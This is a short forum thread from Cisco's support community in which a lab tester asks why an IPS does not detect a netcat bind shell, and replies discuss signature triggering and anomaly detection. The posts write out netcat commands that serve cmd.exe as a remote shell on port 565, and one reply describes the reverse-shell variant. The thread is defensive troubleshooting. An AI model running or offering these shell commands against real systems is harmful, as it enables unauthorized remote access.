Cisco Support Community
cancel
Showing results for 
Search instead for 
Did you mean: 
Announcements
Step-by-Step Configuration and Troubleshooting Best Practices for the NGFW, NGIPS and AMP Technologies A Visual Guide to the Cisco Firepower Threat Defense (FTD)
Community Member

IPS will not detect a successful netcat attack

I am doing the following lab testing:

nc ?v ?l ?e cmd.exe ?p 565

Attacker:

nc ?v .x.x.x.x 565

I was able to get the remote prompt and the IDS never fires an alarm. Is there a signature for detecting this kind of attack? Or, is there any signature tuning that can be done for that? What would be the best way for detecting and firing an alarm for that attack?

Any help is highly appreciated.

5 REPLIES
Community Member

Re: IPS will not detect a successful netcat attack

***

nc -v -l -e cmd.exe -p 565

Attacker:

nc -v .x.x.x.x 565

Gold

Re: IPS will not detect a successful netcat attack

You are using netcat to setup a listener on port 565 and asking it to execute cmd.exe when a client connects. It doesn't actually send "cmd.exe" to the client, it redirects STDIN and STDOUT to the client.

To trigger your signature, setup the listener without a "-e" command. Have the client use "-e cmd.exe" when connecting.

Community Member

Re: IPS will not detect a successful netcat attack

Got it! But, as a matter of fact my doubt was:

Can IDS sensors detect netcat activity on the network? Does the netcat operates in a RFC TCP standards and therefore it is seen as normal traffic?

Gold

Re: IPS will not detect a successful netcat attack

Not reliably AFAIK. It's not like telnet or ftp that tend to use specific ports or have application RFC's. With the latest version of Cisco IDS you might be able to trigger on unusual port usage (anomaly detection). I haven't played with that much yet myself.

Community Member

Re: IPS will not detect a successful netcat attack

Thanks Matt! I'll try to update the sensor and play with that then.

393
Views
0
Helpful
5
Replies
CreatePlease to create content